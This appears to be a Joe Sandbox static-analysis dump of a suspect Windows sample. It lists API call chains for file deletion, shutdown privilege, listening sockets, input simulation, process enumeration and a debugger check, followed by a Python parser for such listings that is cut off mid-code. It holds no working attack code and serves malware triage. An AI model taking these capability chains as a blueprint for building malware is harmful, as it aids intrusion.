                                          • Part of subcall function 000DD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,000DD21C,?,?), ref: 000DD2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 000DD253
                                        • FindClose.KERNEL32(00000000), ref: 000DD264
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: 20c3923c27315b25d2e25b7ac1603ce8e17e52d35b76b02afa40dae97aa062f2
                                        • Instruction ID: e4570435cb19d01ff158cd2a692021fa101dd666da232d547503c893eb23a253
                                        • Opcode Fuzzy Hash: 20c3923c27315b25d2e25b7ac1603ce8e17e52d35b76b02afa40dae97aa062f2
                                        • Instruction Fuzzy Hash: EE617C31C0120DAACF15EBE0D992DFDB7B5AF65300F208166E40677292EB34AF09CB65
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 6755d14ae4697287231fdead524d64e0ef01ee9a7f031fbec14dd01ae23b3ebf
                                        • Instruction ID: fce4b86fb7387843f4d2deef99067ee2ce2645faeba1de9914f5f6af70a06ed6
                                        • Opcode Fuzzy Hash: 6755d14ae4697287231fdead524d64e0ef01ee9a7f031fbec14dd01ae23b3ebf
                                        • Instruction Fuzzy Hash: 8B41AC35604691AFE320DF16D888F19BBE1AF44328F14C199E4599BB62C776EC81CFD0
                                        APIs
                                          • Part of subcall function 000D16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                          • Part of subcall function 000D16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                          • Part of subcall function 000D16C3: GetLastError.KERNEL32 ref: 000D174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 000DE932
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        • Opcode ID: 81c5fcf9c3ccf0feba62c1abddf9d46ef94831653c5813192c2392225234ba02
                                        • Instruction ID: 93cfa1101fa44c9effe0622f3d5d5ba2f6d59934124578d3484f5536dd1f3a45
                                        • Opcode Fuzzy Hash: 81c5fcf9c3ccf0feba62c1abddf9d46ef94831653c5813192c2392225234ba02
                                        • Instruction Fuzzy Hash: BB012672611311BBEB6433B4DC96FFFB29C9714744F140923F802E62D2DAA05C8086F0
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000F1276
                                        • WSAGetLastError.WSOCK32 ref: 000F1283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000F12BA
                                        • WSAGetLastError.WSOCK32 ref: 000F12C5
                                        • closesocket.WSOCK32(00000000), ref: 000F12F4
                                        • listen.WSOCK32(00000000,00000005), ref: 000F1303
                                        • WSAGetLastError.WSOCK32 ref: 000F130D
                                        • closesocket.WSOCK32(00000000), ref: 000F133C
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: fdd9d6aac11a17077c58a6f26d49ba55c8d708a451b62fe94d2b96f5bb1c6b5f
                                        • Instruction ID: 4ceb750356be7dd961195b45f89f1ad9ad54a9fd86456e70515d9bd52e40cb9d
                                        • Opcode Fuzzy Hash: fdd9d6aac11a17077c58a6f26d49ba55c8d708a451b62fe94d2b96f5bb1c6b5f
                                        • Instruction Fuzzy Hash: 4E418F31A00104DFD750DF64C488BA9BBE6AF86318F18C199E9568F6D2C771ED81DBE1
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000DD420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 000DD470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000DD481
                                        • FindClose.KERNEL32(00000000), ref: 000DD498
                                        • FindClose.KERNEL32(00000000), ref: 000DD4A1
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: 9bb6b5d6b7061c5936065c58c13b9bfdc7cb5ba436aca8575ae8790d38088134
                                        • Instruction ID: 519edf9f085325b57813f15724b8dd9f97d30daa8638e87a8a2e980a332a4e18
                                        • Opcode Fuzzy Hash: 9bb6b5d6b7061c5936065c58c13b9bfdc7cb5ba436aca8575ae8790d38088134
                                        • Instruction Fuzzy Hash: C73182314083459BC310EF64C8528EF77E8BF92314F448A1EF4D553292EB34AA09CBA7
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 74328be0f408175808c369549f6b9367736b91dc59e0fa32ccc0dd297459df76
                                        • Instruction ID: 9488d1ddfb88219ae65117cc58e21adca56559d84a232637f7a8fd91969a7af2
                                        • Opcode Fuzzy Hash: 74328be0f408175808c369549f6b9367736b91dc59e0fa32ccc0dd297459df76
                                        • Instruction Fuzzy Hash: BAC25A71E086298FDB65CEA8DD407EAB7F5EB4A304F1441EAD44DE7241E778AE818F40
                                        APIs
                                        • _wcslen.LIBCMT ref: 000E64DC
                                        • CoInitialize.OLE32(00000000), ref: 000E6639
                                        • CoCreateInstance.OLE32(0010FCF8,00000000,00000001,0010FB68,?), ref: 000E6650
                                        • CoUninitialize.OLE32 ref: 000E68D4
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 18b4250bdc11dc981118674e708d42bb8702155860bc8a1cc0ad0c981b211c10
                                        • Instruction ID: 51f14e56446e3e5e74f5f5fb76adc9fa06f7437e1d1b6348f10cfed2ea923e38
                                        • Opcode Fuzzy Hash: 18b4250bdc11dc981118674e708d42bb8702155860bc8a1cc0ad0c981b211c10
                                        • Instruction Fuzzy Hash: CCD15B71608741AFD314DF24C881DABB7E8FF94344F00896DF5999B2A2DB71E905CB92
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 000F22E8
                                          • Part of subcall function 000EE4EC: GetWindowRect.USER32(?,?), ref: 000EE504
                                        • GetDesktopWindow.USER32 ref: 000F2312
                                        • GetWindowRect.USER32(00000000), ref: 000F2319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000F2355
                                        • GetCursorPos.USER32(?), ref: 000F2381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000F23DF
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: e53f7665e24e214b8af07b37380a5dfa32889209e21bc86bd2e3892a8354ff38
                                        • Instruction ID: ac8baca923b12c0a90436bd0c8556092ceeb00c1d695868544b5aebad74659e9
                                        • Opcode Fuzzy Hash: e53f7665e24e214b8af07b37380a5dfa32889209e21bc86bd2e3892a8354ff38
                                        • Instruction Fuzzy Hash: 5A31CFB2505359AFC720DF14C845EABBBE9FF84314F000A19F98597291DB75EA48CBD2
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000E9B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000E9C8B
                                          • Part of subcall function 000E3874: GetInputState.USER32 ref: 000E38CB
                                          • Part of subcall function 000E3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000E3966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000E9BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000E9C75
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 783f0edfd34ad60b6b33b703d65d42d239be9cdc79ac9d44567ddbf50472a8c4
                                        • Instruction ID: 34b1f0bab64d54258c424f94905ca4e629a9e25050fcfcdd95393faf3a7960a2
                                        • Opcode Fuzzy Hash: 783f0edfd34ad60b6b33b703d65d42d239be9cdc79ac9d44567ddbf50472a8c4
                                        • Instruction Fuzzy Hash: BE418271D0024AAFDF54EF65C945AEEBBF8EF05310F248155E505B2192EB349E84CFA4
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00089A4E
                                        • GetSysColor.USER32(0000000F), ref: 00089B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00089B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        • Opcode ID: 0dee26294551ad96731ffca259a3223ff88e0d778c6b8078a2931944c0833122
                                        • Instruction ID: 160fdc621c9042a9edc9d7b8dc19373b4ae8e8caf7b2cc24c67dd0ec208993d2
                                        • Opcode Fuzzy Hash: 0dee26294551ad96731ffca259a3223ff88e0d778c6b8078a2931944c0833122
                                        • Instruction Fuzzy Hash: 95A1F570208414BEE678BB2C8C58E7F26DDFB82350B19020DF582D6ED2CB659D41DBB6
                                        APIs
                                          • Part of subcall function 000F304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                          • Part of subcall function 000F304E: _wcslen.LIBCMT ref: 000F309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000F185D
                                        • WSAGetLastError.WSOCK32 ref: 000F1884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000F18DB
                                        • WSAGetLastError.WSOCK32 ref: 000F18E6
                                        • closesocket.WSOCK32(00000000), ref: 000F1915
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 08e83e62c96bf03193814815446e74fe213226803bcd64d3c33000cf2f79970a
                                        • Instruction ID: bc3a0f1e71b0ce80ca94db465672e6992ba42c9002f92b77c41167321f7bd187
                                        • Opcode Fuzzy Hash: 08e83e62c96bf03193814815446e74fe213226803bcd64d3c33000cf2f79970a
                                        • Instruction Fuzzy Hash: 9A51A171A00204AFE710AF24C886FBA77E5AB44718F54C058FA4A5F6C3DA75AD428BE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: ecf903234c47d4ec521dba45fdf6927ae24171029565607dbf40a875cecef9cc
                                        • Instruction ID: 4c7431879bc99628e552bc9de8fe4d5bd2144318fef1af18719f080fef687e07
                                        • Opcode Fuzzy Hash: ecf903234c47d4ec521dba45fdf6927ae24171029565607dbf40a875cecef9cc
                                        • Instruction Fuzzy Hash: FD2176317402116FE7249F16C844B5A7B95BF95315F198068E88A8B391CBB5DC42CB94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: 52f5b08c703cbef701a042f4c125efa30e73e0ea2d3bdbb07154002ad23839b8
                                        • Instruction ID: 6847919f3beca5b4b5a9ea202aeb4f64829facb45c068aeae902cbf28899c709
                                        • Opcode Fuzzy Hash: 52f5b08c703cbef701a042f4c125efa30e73e0ea2d3bdbb07154002ad23839b8
                                        • Instruction Fuzzy Hash: A2A27E70E4061ACBDF74CF58C8447EEB7B1BB54310F24C5AAD819A7281EB799E81CB94
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000FA6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000FA6BA
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000FA79C
                                        • CloseHandle.KERNEL32(00000000), ref: 000FA7AB
                                          • Part of subcall function 0008CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000B3303,?), ref: 0008CE8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        • Opcode ID: f057740f65308a026b7ffe256871739f7d373372503194775b7e3470a23c8273
                                        • Instruction ID: 89e87a785caf9b52f4841c0759c35c5c18f4399e46fc5f2c092366c4434b7ab5
                                        • Opcode Fuzzy Hash: f057740f65308a026b7ffe256871739f7d373372503194775b7e3470a23c8273
                                        • Instruction Fuzzy Hash: 5F5170B19083019FD710EF24C886EABBBE8FF89754F40891DF58997252EB74D905CB92
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 000DAAAC
                                        • SetKeyboardState.USER32(00000080), ref: 000DAAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 000DAB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 000DAB88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 12eb0a46f4ac6b9bea69003887fa560237e9448a9ac131c23d7abf15b992bb60
                                        • Instruction ID: a46c8b1649791ad076a386d4739d3e784c04c990d70d5bedc6b13e008f8f07b0
                                        • Opcode Fuzzy Hash: 12eb0a46f4ac6b9bea69003887fa560237e9448a9ac131c23d7abf15b992bb60
                                        • Instruction Fuzzy Hash: D031D530B40348AEEF358B648C05BFA7BEAAB46320F14421BF581563D2D3758982C7B6
                                        APIs
                                        • _free.LIBCMT ref: 000ABB7F
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • GetTimeZoneInformation.KERNEL32 ref: 000ABB91
                                        • WideCharToMultiByte.KERNEL32(00000000,?,0014121C,000000FF,?,0000003F,?,?), ref: 000ABC09
                                        • WideCharToMultiByte.KERNEL32(00000000,?,00141270,000000FF,?,0000003F,?,?,?,0014121C,000000FF,?,0000003F,?,?), ref: 000ABC36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                        • String ID:
                                        • API String ID: 806657224-0
                                        • Opcode ID: 9b913103d088621ad86bdcbcbb0946f78bf56083b54d6f07f755cbf75281fbdc
                                        • Instruction ID: 1d57171605cb38270c8a48c8ad661c82b73f6dc9ad721b2a02f8cdadec741f9e
                                        • Opcode Fuzzy Hash: 9b913103d088621ad86bdcbcbb0946f78bf56083b54d6f07f755cbf75281fbdc
                                        • Instruction Fuzzy Hash: 60319E75944245EFCB11DFA99C8096DBBF8BF47720B24426AE051D72B2D7B09A80CB90
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 000ECE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 000ECEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 000ECEFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        • Opcode ID: 9efb9a7a5d90741fa76099c77799c0d310c2547c3b4cda0ae09705cf9321e4cf
                                        • Instruction ID: d2f132dcf338ce4ccc3606bbb8bf1efb6b297ffe6ba19594cfd44c31a7a701bd
                                        • Opcode Fuzzy Hash: 9efb9a7a5d90741fa76099c77799c0d310c2547c3b4cda0ae09705cf9321e4cf
                                        • Instruction Fuzzy Hash: B921BD71500345AFEB30DFA6C949FAAB7F8EB00354F10442EE546A2652E771EE469BA0
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000D82AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: b0b5f39229f5a2e0cc7a0fa9431c82d0bcb05e31c56aa0924105f0459b722082
                                        • Instruction ID: 520cb8a7f0c7cc3ff01ee09f7250816f92113d3f9bf9d657377e8aada4221c03
                                        • Opcode Fuzzy Hash: b0b5f39229f5a2e0cc7a0fa9431c82d0bcb05e31c56aa0924105f0459b722082
                                        • Instruction Fuzzy Hash: 7A322674A007059FCB28CF69C481AAAB7F0FF48710B15C56EE59ADB3A1EB70E941CB54
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E5CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E5D17
                                        • FindClose.KERNEL32(?), ref: 000E5D5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 319d0c6f62fc57315eb32da0ec8ada95d679d53c10b03e6c459e0639766db019
                                        • Instruction ID: 9f7245e4a94e09038bb06be2877805aedfcbeded4b20ab48afc477caacf0733f
                                        • Opcode Fuzzy Hash: 319d0c6f62fc57315eb32da0ec8ada95d679d53c10b03e6c459e0639766db019
                                        • Instruction Fuzzy Hash: E5519E34604A419FC714DF29C894E9AB7E4FF4A318F14895DE99A9B3A2CB30ED44CF91
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 000A271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000A2724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 000A2731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 6ba4638fb05c1ee91d66929dc91ab671beca7d330bd989e04eb3108eff1e9644
                                        • Instruction ID: 7aebffa3d1fe33c8cc2b55e21b5f21679ac797e42e8ed3626512073a6bdecb97
                                        • Opcode Fuzzy Hash: 6ba4638fb05c1ee91d66929dc91ab671beca7d330bd989e04eb3108eff1e9644
                                        • Instruction Fuzzy Hash: 4931D574911218ABCB21DF68DC887DCB7B8BF08310F5042EAE81CA7261E7709F818F85
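                                        The "APIs" entries on this page (the bullet, "Part of subcall function ADDR:" and "ref: ADDR" conventions of the Joe Sandbox IDA plugin output) are plain text, which is awkward to triage at scale. The following is an added example, not Joe Sandbox code and not code from the analysed sample: it parses entries of that shape into call records and tags each function with the behaviour its API chain implies, decoding the socket() arguments into their documented Winsock constants on the way. The sample input is copied from three entries above (process enumeration, the debugger check, the UDP socket bind); the rule table and tag names are this example's own choices, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox "APIs" listings into call records and tag each function with
the behaviour its API chain implies.  Added example; not Joe Sandbox or sample code."""
import re
from dataclasses import dataclass

# Constructed input: bullet lines copied from three entries on this page
# (process enumeration, debugger check, UDP socket bind).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 000FA6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 000FA6BA
  • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
• Process32NextW.KERNEL32(00000000,?), ref: 000FA79C
• CloseHandle.KERNEL32(00000000), ref: 000FA7AB
APIs
• IsDebuggerPresent.KERNEL32 ref: 000A271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000A2724
• UnhandledExceptionFilter.KERNEL32(?), ref: 000A2731
APIs
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000F185D
• WSAGetLastError.WSOCK32 ref: 000F1884
• bind.WSOCK32(00000000,?,00000010), ref: 000F18DB
"""

# One bullet: optional "Part of subcall function ADDR:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR".  A '?' argument was not resolved statically.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
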